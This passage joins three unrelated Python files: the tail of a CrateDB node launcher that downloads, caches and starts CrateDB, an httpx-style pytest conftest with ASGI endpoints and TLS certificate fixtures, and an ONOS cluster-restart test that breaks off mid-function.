msg,
proc.pid,
logfile,
self.data_path
)
self.addresses = DotDict({})
self.monitor.consumers.append(AddrConsumer(self._set_addr))
self.monitor.start(proc)
log_lines = []
self.monitor.consumers.append(log_lines.append)
spinner = cycle(['/', '-', '\\', '|'])
def show_spinner():
if sys.stdout.isatty():
print(next(spinner), end='\r')
return True
try:
wait_until(
lambda: show_spinner() and _ensure_running(proc) and self.http_host,
timeout=60
)
host = self.addresses.http.host
port = self.addresses.http.port
wait_until(
lambda: _ensure_running(proc) and _is_up(host, port),
timeout=30
)
if _has_ssl(host, port):
self.http_url = self.http_url.replace('http://', 'https://')
wait_until(
lambda: show_spinner() and cluster_state_200(self.http_url),
timeout=30
)
except (SystemExit, TimeoutError):
if not log_lines:
_try_print_log(logfile)
else:
for line in (x.rstrip() for x in log_lines if x):
log.error(line)
raise SystemExit("CrateDB didn't start in time or couldn't form a cluster.") from None
else:
self.monitor.consumers.remove(log_lines.append)
log.info('Cluster ready to process requests')
def _set_addr(self, protocol, addr):
log.info('{0:10}: {1}'.format(protocol.capitalize(), addr))
host, port = addr.rsplit(':', 1)
port = int(port)
self.addresses[protocol] = Address(host, port)
if protocol == 'http':
self.http_host = addr
self.http_url = 'http://' + addr
def stop(self):
if self.process:
self.process.terminate()
self.process.communicate(timeout=10)
self.addresses = DotDict({})
self.http_host = None
self.http_url = None
if not self.keep_data:
path = self.data_path.split(',')
for p in path:
shutil.rmtree(p)
def __enter__(self):
return self
def __exit__(self, *ex):
self.stop()
class Address(NamedTuple):
host: str
port: int
class AddrConsumer:
ADDRESS_RE = re.compile(
r'.*\[(?P<protocol>http|i.c.p.h.CrateNettyHttpServerTransport|o.e.h.n.Netty4HttpServerTransport|o.e.h.HttpServer|psql|transport|o.e.t.TransportService)\s*\] \[.*\] .*'
r'publish_address {'
r'(?:(inet\[[A-Za-z-\.]*/)|([A-Za-z\.]*/))?'
r'?(?P<addr>\[?[\d\.:]+\]?:?\d+)'
r'(?:\])?'
r'}'
)
PROTOCOL_MAP = {
'i.c.p.h.CrateNettyHttpServerTransport': 'http',
'o.e.h.n.Netty4HttpServerTransport': 'http',
'o.e.h.HttpServer': 'http',
'o.e.t.TransportService': 'transport'
}
def __init__(self, on_addr):
self.on_addr = on_addr
@staticmethod
def _parse(line):
""" Parse protocol and bound address from log message
>>> AddrConsumer._parse('NONE')
(None, None)
>>> AddrConsumer._parse('[INFO ][i.c.p.h.CrateNettyHttpServerTransport] [Widderstein] publish_address {127.0.0.1:4200}, bound_addresses {[fe80::1]:4200}, {[::1]:4200}, {127.0.0.1:4200}')
('http', '127.0.0.1:4200')
>>> AddrConsumer._parse('[INFO ][o.e.h.n.Netty4HttpServerTransport] [Piz Forun] publish_address {127.0.0.1:4200}, bound_addresses {[::1]:4200}, {127.0.0.1:4200}')
('http', '127.0.0.1:4200')
>>> AddrConsumer._parse('[INFO ][o.e.t.TransportService ] [Widderstein] publish_address {127.0.0.1:4300}, bound_addresses {[fe80::1]:4300}, {[::1]:4300}, {127.0.0.1:4300}')
('transport', '127.0.0.1:4300')
>>> AddrConsumer._parse('[INFO ][psql ] [Widderstein] publish_address {127.0.0.1:5432}, bound_addresses {127.0.0.1:5432}')
('psql', '127.0.0.1:5432')
"""
m = AddrConsumer.ADDRESS_RE.match(line)
if not m:
return None, None
protocol = m.group('protocol')
protocol = AddrConsumer.PROTOCOL_MAP.get(protocol, protocol)
return protocol, m.group('addr')
def send(self, line):
protocol, addr = AddrConsumer._parse(line)
if protocol:
self.on_addr(protocol, addr)
def _openuri(uri):
if os.path.isfile(uri):
return open(uri, 'rb')
return io.BytesIO(urlopen(uri).read())
def _can_use_cache(uri, crate_dir):
if not os.path.exists(crate_dir):
return False
os.utime(crate_dir) # update mtime to avoid removal
if os.path.isfile(uri):
with _openuri(uri) as f:
checksum = sha1(f.read()).hexdigest()
return os.path.exists(os.path.join(crate_dir, checksum))
# Always enable use of the cache if the source is not local
return True
def _download_and_extract(uri, crate_root):
filename = os.path.basename(uri)
crate_folder_name = re.sub(r'\.tar(\.gz)?$', '', filename)
crate_dir = os.path.join(crate_root, crate_folder_name)
if _can_use_cache(uri, crate_dir):
log.info('Skipping download, tarball alrady extracted at %s', crate_dir)
return crate_dir
elif os.path.exists(crate_dir):
shutil.rmtree(crate_dir, ignore_errors=True)
log.info('Downloading %s and extracting to %s', uri, crate_root)
with _openuri(uri) as tmpfile:
with tarfile.open(fileobj=tmpfile) as t:
t.extractall(crate_root)
tmpfile.seek(0)
checksum = sha1(tmpfile.read()).hexdigest()
with open(os.path.join(crate_dir, checksum), 'a'):
os.utime(os.path.join(crate_dir, checksum))
return crate_dir
def _from_versions_json(key):
def retrieve():
with urlopen('https://crate.io/releases.json') as r:
if r.headers.get('Content-Encoding') == 'gzip':
with gzip.open(r, 'rt') as r:
versions = json.loads(r.read())
else:
versions = json.loads(r.read().decode('utf-8'))
segments = ReleaseUrlSegments.create()
downloads = versions[key]['downloads']
if segments.platform_key in downloads:
return downloads[segments.platform_key]['url']
else:
return downloads['tar.gz']['url']
return retrieve
RELEASE_RE = re.compile(r'.*>(?P<filename>crate-(?P<version>\d+\.\d+\.\d+)\.tar\.gz)<.*')
def _retrieve_crate_versions():
base_uri = 'https://cdn.crate.io/downloads/releases/'
with urlopen(base_uri) as r:
lines = (line.decode('utf-8') for line in r)
for line in lines:
m = RELEASE_RE.match(line)
if m:
yield m.group('version')
def _find_matching_version(versions, version_pattern):
"""
Return the first matching version
>>> _find_matching_version(['1.1.4', '1.0.12', '1.0.5'], '1.0.x')
'1.0.12'
>>> _find_matching_version(['1.1.4', '1.0.6', '1.0.5'], '2.x.x')
"""
pattern = fnmatch.translate(version_pattern.replace('x', '*'))
return next((v for v in versions if re.match(pattern, v)), None)
_version_lookups = {
'latest': _from_versions_json('stable'),
'latest-stable': _from_versions_json('stable'),
'latest-testing': _from_versions_json('testing'),
'latest-nightly': _from_versions_json('nightly')
}
def _get_uri_from_released_version(version: str) -> str:
version_tup = parse_version(version)
if version_tup < (4, 2, 0):
return RELEASE_URL.format(version=version)
try:
return ReleaseUrlSegments.create().get_uri(version)
except ValueError:
# Unsupported platform, just return the linux tarball
return RELEASE_URL.format(version=version)
def _lookup_uri(version):
if version in _version_lookups:
version = _version_lookups[version]()
m = VERSION_RE.match(version)
if m:
return _get_uri_from_released_version(m.group(0))
m = DYNAMIC_VERSION_RE.match(version)
if m:
versions = sorted(map(parse_version, list(_retrieve_crate_versions())))
versions = ['.'.join(map(str, v)) for v in versions[::-1]]
release = _find_matching_version(versions, m.group(0))
if release:
return _get_uri_from_released_version(release)
return version
def _is_project_repo(src_repo):
return (os.path.isdir(src_repo) and
os.path.exists(os.path.join(src_repo, '.git')) and
os.path.exists(os.path.join(src_repo, 'gradlew')))
def _build_tarball(src_repo) -> Path:
""" Build a tarball from src and return the path to it """
run = partial(subprocess.run, cwd=src_repo, check=True)
run(['git', 'clean', '-xdff'])
src_repo = Path(src_repo)
if os.path.exists(src_repo / 'es' / 'upstream'):
run(['git', 'submodule', 'update', '--init', '--', 'es/upstream'])
run(['./gradlew', '--parallel', '--no-daemon', 'clean', 'distTar'])
distributions = Path(src_repo) / 'app' / 'build' / 'distributions'
return next(distributions.glob('crate-*.tar.gz'))
def _extract_tarball(tarball):
with tarfile.open(tarball) as t:
folder_name = t.getnames()[0]
t.extractall(tarball.parent)
return str(tarball.parent / folder_name)
def _build_from_release_branch(branch, crate_root):
crates = Path(crate_root)
src_repo = crates / 'sources_tmp'
run_in_repo = partial(subprocess.run, cwd=src_repo, check=True)
if not src_repo.exists() or not (src_repo / '.git').exists():
clone = ['git', 'clone', REPO_URL, 'sources_tmp']
subprocess.run(clone, cwd=crate_root, check=True)
else:
run_in_repo(['git', 'fetch'])
run_in_repo(['git', 'checkout', branch])
run_in_repo(['git', 'pull', 'origin', branch])
rev_parse_p = run_in_repo(
['git', 'rev-parse', 'HEAD'], stdout=subprocess.PIPE, encoding='utf-8')
revision = rev_parse_p.stdout.strip()
builds_dir = crates / 'builds'
os.makedirs(builds_dir, exist_ok=True)
cached_build = builds_dir / (revision + '.tar.gz')
if os.path.isfile(cached_build):
return _extract_tarball(cached_build)
tarball = _build_tarball(str(src_repo))
shutil.copy(tarball, cached_build)
return _extract_tarball(tarball)
def _remove_old_crates(path):
now = time.time()
s7days_ago = now - (7 * 24 * 60 * 60)
with contextlib.suppress(FileNotFoundError):
old_unused_dirs = (e for e in os.scandir(path)
if e.is_dir() and e.stat().st_mtime < s7days_ago)
for e in old_unused_dirs:
last_use = datetime.fromtimestamp(e.stat().st_mtime)
msg = f'Removing from cache: {e.name} (last use: {last_use:%Y-%m-%d %H:%M})'
print(msg, file=sys.stderr)
shutil.rmtree(e.path)
def _crates_cache() -> str:
""" Return the path to the crates cache folder """
return os.environ.get(
'XDG_CACHE_HOME',
os.path.join(os.path.expanduser('~'), '.cache', 'cr8', 'crates'))
def get_crate(version, crate_root=None):
"""Retrieve a Crate tarball, extract it and return the path.
Args:
version: The Crate version to get.
Can be specified in different ways:
- A concrete version like '0.55.0'
- A version including a `x` as wildcards. Like: '1.1.x' or '1.x.x'.
This will use the latest version that matches.
- Release branch, like `3.1`
- Any branch: 'branch:<branchName>'
- An alias: 'latest-stable' or 'latest-testing'
- A URI pointing to a crate tarball
crate_root: Where to extract the tarball to.
If this isn't specified ``$XDG_CACHE_HOME/.cache/cr8/crates``
will be used.
"""
if not crate_root:
crate_root = _crates_cache()
os.makedirs(crate_root, exist_ok=True)
_remove_old_crates(crate_root)
if _is_project_repo(version):
return _extract_tarball(_build_tarball(version))
m = BRANCH_VERSION_RE.match(version)
if m:
return _build_from_release_branch(m.group(0), crate_root)
if version.startswith('branch:'):
return _build_from_release_branch(version[len('branch:'):], crate_root)
uri = _lookup_uri(version)
crate_dir = _download_and_extract(uri, crate_root)
return crate_dir
def _parse_options(options: List[str]) -> Dict[str, str]:
""" Parse repeatable CLI options
>>> opts = _parse_options(['cluster.name=foo', 'CRATE_JAVA_OPTS="-Dxy=foo"'])
>>> print(json.dumps(opts, sort_keys=True))
{"CRATE_JAVA_OPTS": "\\"-Dxy=foo\\"", "cluster.name": "foo"}
"""
try:
return dict(i.split('=', maxsplit=1) for i in options) # type: ignore
except ValueError:
raise ArgumentError(
f'Option must be in format <key>=<value>, got: {options}')
def create_node(
version,
env=None,
setting=None,
crate_root=None,
keep_data=False,
java_magic=False,
):
init_logging(log)
settings = {
'cluster.name': 'cr8-crate-run' + str(random.randrange(1e9))
}
crate_dir = get_crate(version, crate_root)
if setting:
settings.update(_parse_options(setting))
if env:
env = _parse_options(env)
return CrateNode(
crate_dir=crate_dir,
env=env,
settings=settings,
keep_data=keep_data,
java_magic=java_magic
)
@argh.arg('version', help='Crate version to run')
@argh.arg('-e', '--env', action='append',
help='Environment variable. Option can be specified multiple times.')
@argh.arg('-s', '--setting', action='append',
help='Crate setting. Option can be specified multiple times.')
@argh.arg('--keep-data', help='If this is set the data folder will be kept.')
@argh.arg(
'--disable-java-magic',
help='Disable the logic to detect a suitable JAVA_HOME')
@argh.wrap_errors([ArgumentError])
def run_crate(
version,
env=None,
setting=None,
crate_root=None,
keep_data=False,
disable_java_magic=False,
):
"""Launch a crate instance.
Supported version specifications:
- Concrete version like "0.55.0" or with wildcard: "1.1.x"
- An alias (one of [latest-nightly, latest-stable, latest-testing])
- A URI pointing to a CrateDB tarball (in .tar.gz format)
- A URI pointing to a checked out CrateDB repo directory
- A branch like `branch:master` or `branch:my-new-feature`
run-crate supports command chaining. To launch a CrateDB node and another
sub-command use:
cr8 run-crate <ver> -- timeit -s "select 1" --hosts '{node.http_url}'
To launch any (blocking) subprocess, prefix the name with '@':
cr8 run-crate <version> -- @http '{node.http_url}'
If run-crate is invoked using command chaining it will exit once all
chained commands finished.
The postgres host and port are available as {node.addresses.psql.host} and
{node.addresses.psql.port}
"""
with create_node(
version,
env,
setting,
crate_root,
keep_data,
java_magic=not disable_java_magic,
) as n:
try:
n.start()
n.process.wait()
except KeyboardInterrupt:
print('Stopping Crate...')
if __name__ == "__main__":
argh.dispatch_command(run_crate)
|
conftest.py
|
import asyncio
import json
import os
import threading
import time
import typing
import pytest
import trustme
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import (
BestAvailableEncryption,
Encoding,
PrivateFormat,
load_pem_private_key,
)
from uvicorn.config import Config
from uvicorn.main import Server
from httpx import URL
from tests.concurrency import sleep
ENVIRONMENT_VARIABLES = {
"SSL_CERT_FILE",
"SSL_CERT_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"ALL_PROXY",
"NO_PROXY",
"SSLKEYLOGFILE",
}
@pytest.fixture(
params=[
pytest.param("asyncio", marks=pytest.mark.asyncio),
pytest.param("trio", marks=pytest.mark.trio),
]
)
def async_environment(request: typing.Any) -> str:
"""
Mark a test function to be run on both asyncio and trio.
Equivalent to having a pair of tests, each respectively marked with
'@pytest.mark.asyncio' and '@pytest.mark.trio'.
Intended usage:
```
@pytest.mark.usefixtures("async_environment")
async def my_async_test():
...
```
"""
return request.param
@pytest.fixture(scope="function", autouse=True)
def clean_environ():
"""Keeps os.environ clean for every test without having to mock os.environ"""
original_environ = os.environ.copy()
os.environ.clear()
os.environ.update(
{
k: v
for k, v in original_environ.items()
if k not in ENVIRONMENT_VARIABLES and k.lower() not in ENVIRONMENT_VARIABLES
}
)
yield
os.environ.clear()
os.environ.update(original_environ)
async def app(scope, receive, send):
assert scope["type"] == "http"
if scope["path"].startswith("/slow_response"):
await slow_response(scope, receive, send)
elif scope["path"].startswith("/slow_stream_response"):
await slow_stream_response(scope, receive, send)
elif scope["path"].startswith("/status"):
await status_code(scope, receive, send)
elif scope["path"].startswith("/echo_body"):
await echo_body(scope, receive, send)
elif scope["path"].startswith("/echo_headers"):
await echo_headers(scope, receive, send)
elif scope["path"].startswith("/redirect_301"):
await redirect_301(scope, receive, send)
else:
await hello_world(scope, receive, send)
async def hello_world(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_response(scope, receive, send):
await sleep(1.0)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_stream_response(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await sleep(1)
await send({"type": "http.response.body", "body": b"", "more_body": False})
async def status_code(scope, receive, send):
status_code = int(scope["path"].replace("/status/", ""))
await send(
{
"type": "http.response.start",
"status": status_code,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def echo_body(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
async def echo_headers(scope, receive, send):
body = {}
for name, value in scope.get("headers", []):
body[name.capitalize().decode()] = value.decode()
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"application/json"]],
}
)
await send({"type": "http.response.body", "body": json.dumps(body).encode()})
async def redirect_301(scope, receive, send):
await send(
{"type": "http.response.start", "status": 301, "headers": [[b"location", b"/"]]}
)
await send({"type": "http.response.body"})
SERVER_SCOPE = "session"
@pytest.fixture(scope=SERVER_SCOPE)
def cert_authority():
return trustme.CA()
@pytest.fixture(scope=SERVER_SCOPE)
def ca_cert_pem_file(cert_authority):
with cert_authority.cert_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def localhost_cert(cert_authority):
return cert_authority.issue_cert("localhost")
@pytest.fixture(scope=SERVER_SCOPE)
def cert_pem_file(localhost_cert):
with localhost_cert.cert_chain_pems[0].tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_private_key_file(localhost_cert):
with localhost_cert.private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_encrypted_private_key_file(localhost_cert):
# Deserialize the private key and then reserialize with a password
private_key = load_pem_private_key(
localhost_cert.private_key_pem.bytes(), password=None, backend=default_backend()
)
encrypted_private_key_pem = trustme.Blob(
private_key.private_bytes(
Encoding.PEM,
PrivateFormat.TraditionalOpenSSL,
BestAvailableEncryption(password=b"password"),
)
)
with encrypted_private_key_pem.tempfile() as tmp:
yield tmp
class TestServer(Server):
@property
def url(self) -> URL:
protocol = "https" if self.config.is_ssl else "http"
return URL(f"{protocol}://{self.config.host}:{self.config.port}/")
def install_signal_handlers(self) -> None:
# Disable the default installation of handlers for signals such as SIGTERM,
# because it can only be done in the main thread.
pass
async def serve(self, sockets=None):
self.restart_requested = asyncio.Event()
loop = asyncio.get_event_loop()
tasks = {
loop.create_task(super().serve(sockets=sockets)),
loop.create_task(self.watch_restarts()),
}
await asyncio.wait(tasks)
async def restart(self) -> None: # pragma: nocover
# This coroutine may be called from a different thread than the one the
# server is running on, and from an async environment that's not asyncio.
# For this reason, we use an event to coordinate with the server
# instead of calling shutdown()/startup() directly, and should not make
# any asyncio-specific operations.
self.started = False
self.restart_requested.set()
while not self.started:
await sleep(0.2)
async def watch_restarts(self): # pragma: nocover
while True:
if self.should_exit:
return
try:
await asyncio.wait_for(self.restart_requested.wait(), timeout=0.1)
except asyncio.TimeoutError:
continue
self.restart_requested.clear()
await self.shutdown()
await self.startup()
def serve_in_thread(server: Server):
thread = threading.Thread(target=server.run)
thread.start()
try:
while not server.started:
time.sleep(1e-3)
yield server
finally:
server.should_exit = True
thread.join()
@pytest.fixture(scope=SERVER_SCOPE)
def server():
config = Config(app=app, lifespan="off", loop="asyncio")
server = TestServer(config=config)
yield from serve_in_thread(server)
@pytest.fixture(scope=SERVER_SCOPE)
def https_server(cert_pem_file, cert_private_key_file):
config = Config(
app=app,
lifespan="off",
ssl_certfile=cert_pem_file,
ssl_keyfile=cert_private_key_file,
port=8001,
loop="asyncio",
)
server = TestServer(config=config)
yield from serve_in_thread(server)
|
clusterTest.py
|
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#copyright 2016-present Ciena Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from nose.tools import *
from scapy.all import *
from OnosCtrl import OnosCtrl
from OltConfig import OltConfig
from CordTestUtils import get_mac, get_controller, get_controllers, log_test
from OnosFlowCtrl import OnosFlowCtrl
from nose.twistedtools import reactor, deferred
from twisted.internet import defer
from onosclidriver import OnosCliDriver
from CordContainer import Container, Onos, Quagga
from CordTestServer import cord_test_onos_restart, cord_test_onos_shutdown, cord_test_onos_add_cluster, cord_test_quagga_restart, cord_test_restart_cluster
from portmaps import g_subscriber_port_map
from scapy.all import *
import time, monotonic
import threading
from threading import current_thread
from Cluster import *
from EapTLS import TLSAuthTest
from ACL import ACLTest
from OnosLog import OnosLog
from CordLogger import CordLogger
from CordTestConfig import setup_module, teardown_module
import os
import json
import random
import collections
log_test.setLevel('INFO')
class cluster_exchange(CordLogger):
test_path = os.path.dirname(os.path.realpath(__file__))
onos_config_path = os.path.join(test_path, '..', 'setup/onos-config')
mac = RandMAC()._fix()
flows_eth = Ether(src = RandMAC()._fix(), dst = RandMAC()._fix())
igmp_eth = Ether(dst = '01:00:5e:00:00:16', type = ETH_P_IP)
igmp_ip = IP(dst = '224.0.0.22')
ONOS_INSTANCES = 3
V_INF1 = 'veth0'
TLS_TIMEOUT = 100
device_id = 'of:' + get_mac()
igmp = cluster_igmp()
igmp_groups = igmp.mcast_ip_range(start_ip = '224.1.8.10',end_ip = '224.1.10.49')
igmp_sources = igmp.source_ip_range(start_ip = '38.24.29.35',end_ip='38.24.35.56')
tls = cluster_tls()
flows = cluster_flows()
proxyarp = cluster_proxyarp()
vrouter = cluster_vrouter()
acl = cluster_acl()
dhcprelay = cluster_dhcprelay()
subscriber = cluster_subscriber()
testcaseLoggers = ('test_cluster_controller_restarts', 'test_cluster_graceful_controller_restarts',
'test_cluster_single_controller_restarts', 'test_cluster_restarts')
ITERATIONS = int(os.getenv('ITERATIONS', 10))
ARCHIVE_PARTITION = False
def setUp(self):
if self._testMethodName not in self.testcaseLoggers:
super(cluster_exchange, self).setUp()
def tearDown(self):
if self._testMethodName not in self.testcaseLoggers:
super(cluster_exchange, self).tearDown()
def cliEnter(self, controller = None):
retries = 0
while retries < 30:
self.cli = OnosCliDriver(controller = controller, connect = True)
if self.cli.handle:
break
else:
retries += 1
time.sleep(2)
def cliExit(self):
self.cli.disconnect()
def get_leader(self, controller = None):
self.cliEnter(controller = controller)
try:
result = json.loads(self.cli.leaders(jsonFormat = True))
except:
result = None
if result is None:
log_test.info('Leaders command failure for controller %s' %controller)
else:
log_test.info('Leaders returned: %s' %result)
self.cliExit()
return result
def onos_shutdown(self, controller = None):
status = True
self.cliEnter(controller = controller)
try:
self.cli.shutdown(timeout = 10)
except:
log_test.info('Graceful shutdown of ONOS failed for controller: %s' %controller)
status = False
self.cliExit()
return status
def log_set(self, level = None, app = 'org.onosproject', controllers = None):
CordLogger.logSet(level = level, app = app, controllers = controllers, forced = True)
def get_leaders(self, controller = None):
result_map = {}
if controller is None:
controller = get_controller()
if type(controller) in [ list, tuple ]:
for c in controller:
leaders = self.get_leader(controller = c)
result_map[c] = leaders
else:
leaders = self.get_leader(controller = controller)
result_map[controller] = leaders
return result_map
def verify_leaders(self, controller = None):
leaders_map = self.get_leaders(controller = controller)
failed = [ k for k,v in leaders_map.items() if v == None ]
return failed
def verify_cluster_status(self,controller = None,onos_instances=ONOS_INSTANCES,verify=False):
tries = 0
try:
self.cliEnter(controller = controller)
while tries <= 10:
cluster_summary = json.loads(self.cli.summary(jsonFormat = True))
if cluster_summary:
log_test.info("cluster 'summary' command output is %s"%cluster_summary)
nodes = cluster_summary['nodes']
if verify:
if nodes == onos_instances:
self.cliExit()
return True
else:
tries += 1
time.sleep(1)
else:
if nodes >= onos_instances:
self.cliExit()
return True
else:
tries += 1
time.sleep(1)
else:
tries += 1
time.sleep(1)
self.cliExit()
return False
except:
raise Exception('Failed to get cluster members')
return False
def get_cluster_current_member_ips(self, controller = None, nodes_filter = None):
tries = 0
cluster_ips = []
try:
self.cliEnter(controller = controller)
while tries <= 10:
cluster_nodes = json.loads(self.cli.nodes(jsonFormat = True))
if cluster_nodes:
log_test.info("cluster 'nodes' output is %s"%cluster_nodes)
if nodes_filter:
cluster_nodes = nodes_filter(cluster_nodes)
cluster_ips = map(lambda c: c['id'], cluster_nodes)
self.cliExit()
cluster_ips.sort(lambda i1,i2: int(i1.split('.')[-1]) - int(i2.split('.')[-1]))
return cluster_ips
else:
tries += 1
self.cliExit()
return cluster_ips
except:
raise Exception('Failed to get cluster members')
return cluster_ips
def get_cluster_container_names_ips(self,controller=None):
onos_names_ips = {}
controllers = get_controllers()
i = 0
for controller in controllers:
if i == 0:
name = Onos.NAME
else:
name = '{}-{}'.format(Onos.NAME, i+1)
onos_names_ips[controller] = name
onos_names_ips[name] = controller
i += 1
return onos_names_ips
# onos_ips = self.get_cluster_current_member_ips(controller=controller)
# onos_names_ips[onos_ips[0]] = Onos.NAME
# onos_names_ips[Onos.NAME] = onos_ips[0]
# for i in range(1,len(onos_ips)):
# name = '{0}-{1}'.format(Onos.NAME,i+1)
# onos_names_ips[onos_ips[i]] = name
# onos_names_ips[name] = onos_ips[i]
# return onos_names_ips
#identifying current master of a connected device, not tested
def get_cluster_current_master_standbys(self,controller=None,device_id=device_id):
master = None
standbys = []
tries = 0
try:
cli = self.cliEnter(controller = controller)
while tries <= 10:
roles = json.loads(self.cli.roles(jsonFormat = True))
log_test.info("cluster 'roles' command output is %s"%roles)
if roles:
for device in roles:
log_test.info('Verifying device info in line %s'%device)
if device['id'] == device_id:
master = str(device['master'])
standbys = map(lambda d: str(d), device['standbys'])
log_test.info('Master and standbys for device %s are %s and %s'%(device_id, master, standbys))
self.cliExit()
return master, standbys
self.cliExit()
return master, standbys
else:
tries += 1
time.sleep(1)
self.cliExit()
return master,standbys
except:
raise Exception('Failed to get cluster members')
return master,standbys
def get_cluster_current_master_standbys_of_connected_devices(self,controller=None):
''' returns master and standbys of all the connected devices to ONOS cluster instance'''
device_dict = {}
tries = 0
try:
cli = self.cliEnter(controller = controller)
while tries <= 10:
device_dict = {}
roles = json.loads(self.cli.roles(jsonFormat = True))
log_test.info("cluster 'roles' command output is %s"%roles)
if roles:
for device in roles:
device_dict[str(device['id'])]= {'master':str(device['master']),'standbys':device['standbys']}
for i in range(len(device_dict[device['id']]['standbys'])):
device_dict[device['id']]['standbys'][i] = str(device_dict[device['id']]['standbys'][i])
log_test.info('master and standbys for device %s are %s and %s'%(device['id'],device_dict[device['id']]['master'],device_dict[device['id']]['standbys']))
self.cliExit()
return device_dict
else:
tries += 1
time.sleep(1)
self.cliExit()
return device_dict
except:
raise Exception('Failed to get cluster members')
return device_dict
#identify current master of a connected device, not tested
def get_cluster_connected_devices(self,controller=None):
'''returns all the devices connected to ONOS cluster'''
device_list = []
tries = 0
try:
cli = self.cliEnter(controller = controller)
while tries <= 10:
device_list = []
devices = json.loads(self.cli.devices(jsonFormat = True))
log_test.info("cluster 'devices' command output is %s"%devices)
if devices:
for device in devices:
log_test.info('device id is %s'%device['id'])
device_list.append(str(device['id']))
self.cliExit()
return device_list
else:
tries += 1
time.sleep(1)
self.cliExit()
return device_list
except:
raise Exception('Failed to get cluster members')
return device_list
def get_number_of_devices_of_master(self,controller=None):
'''returns master-device pairs, which master having what devices'''
master_count = {}
try:
cli = self.cliEnter(controller = controller)
masters = json.loads(self.cli.masters(jsonFormat = True))
if masters:
for master in masters:
master_count[str(master['id'])] = {'size':int(master['size']),'devices':master['devices']}
return master_count
else:
return master_count
except:
raise Exception('Failed to get cluster members')
return master_count
def change_master_current_cluster(self,new_master=None,device_id=device_id,controller=None):
if new_master is None: return False
self.cliEnter(controller=controller)
cmd = 'device-role' + ' ' + device_id + ' ' + new_master + ' ' + 'master'
command = self.cli.command(cmd = cmd, jsonFormat = False)
self.cliExit()
time.sleep(60)
master, standbys = self.get_cluster_current_master_standbys(controller=controller,device_id=device_id)
assert_equal(master,new_master)
log_test.info('Cluster master changed to %s successfully'%new_master)
def withdraw_cluster_current_mastership(self,master_ip=None,device_id=device_id,controller=None):
'''current master looses its mastership and hence new master will be elected'''
self.cliEnter(controller=controller)
cmd = 'device-role' + ' ' + device_id + ' ' + master_ip + ' ' + 'none'
command = self.cli.command(cmd = cmd, jsonFormat = False)
self.cliExit()
time.sleep(60)
new_master_ip, standbys = self.get_cluster_current_master_standbys(controller=controller,device_id=device_id)
assert_not_equal(new_master_ip,master_ip)
log_test.info('Device-role of device %s successfully changed to none for controller %s'%(device_id,master_ip))
log_test.info('Cluster new master is %s'%new_master_ip)
return True
def cluster_controller_restarts(self, graceful = False):
controllers = get_controllers()
ctlr_len = len(controllers)
if ctlr_len <= 1:
log_test.info('ONOS is not running in cluster mode. This test only works for cluster mode')
assert_greater(ctlr_len, 1)
#this call would verify the cluster for once
onos_map = self.get_cluster_container_names_ips()
def check_exception(iteration, controller = None):
adjacent_controller = None
adjacent_controllers = None
if controller:
adjacent_controllers = list(set(controllers) - set([controller]))
adjacent_controller = adjacent_controllers[0]
for node in controllers:
onosLog = OnosLog(host = node)
##check the logs for storage exception
_, output = onosLog.get_log(('ERROR', 'Exception',))
if output and output.find('StorageException$Timeout') >= 0:
log_test.info('\nStorage Exception Timeout found on node: %s\n' %node)
log_test.info('Dumping the ERROR and Exception logs for node: %s\n' %node)
log_test.info('\n' + '-' * 50 + '\n')
log_test.info('%s' %output)
log_test.info('\n' + '-' * 50 + '\n')
failed = self.verify_leaders(controllers)
if failed:
log_test.info('Leaders command failed on nodes: %s' %failed)
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
return controller
try:
ips = self.get_cluster_current_member_ips(controller = adjacent_controller)
log_test.info('ONOS cluster formed with controllers: %s' %ips)
st = True
except:
st = False
failed = self.verify_leaders(controllers)
if failed:
log_test.error('Test failed on ITERATION %d' %iteration)
CordLogger.archive_results(self._testMethodName,
controllers = controllers,
iteration = 'FAILED',
archive_partition = self.ARCHIVE_PARTITION)
assert_equal(len(failed), 0)
if st is False:
log_test.info('No storage exception and ONOS cluster was not formed successfully')
else:
controller = None
return controller
next_controller = None
tries = self.ITERATIONS
for num in range(tries):
index = num % ctlr_len
#index = random.randrange(0, ctlr_len)
controller_name = onos_map[controllers[index]] if next_controller is None else onos_map[next_controller]
controller = onos_map[controller_name]
log_test.info('ITERATION: %d. Restarting Controller %s' %(num + 1, controller_name))
try:
#enable debug log for the other controllers before restarting this controller
adjacent_controllers = list( set(controllers) - set([controller]) )
